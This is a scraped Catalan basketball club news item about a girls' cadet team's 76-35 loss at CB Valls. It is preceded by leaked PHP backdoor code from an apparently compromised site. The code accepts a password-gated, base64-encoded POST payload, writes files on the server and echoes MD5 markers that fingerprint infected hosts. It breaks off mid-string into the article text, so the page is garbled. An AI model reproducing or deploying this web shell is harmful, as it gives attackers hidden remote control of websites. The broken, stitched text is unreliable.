function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Un cadet femení 1 massa irregular perd a la pista del CB Valls (76-35) - Tgn Bàsquet Club -

Un cadet femení 1 massa irregular perd a la pista del CB Valls (76-35)

Updated: octubre 27, 2015

El cadet femení 1 del TGN Bàsquet va perdre a la pista del CB Valls tot i fer minuts de bon joc. A diferència d’altres partits, en què les liles havien concedit massa avantatge al seu rival des de l’inici, en aquest cas la concentració va ser fonamental per aguantar l’embrenzida vallenca (10-11 primer quart). Malgrat tot, el segon període va ser nefast per les tarragonines que van encaixar un parcial de 18-2 en cinc minuts que va trencar definitivament el matx (31-19 al descans). Les visitants, però, no van baixar els braços però les errades en atac i, sobretot, l’alt ritme de joc local en l’últim període, van sentenciar.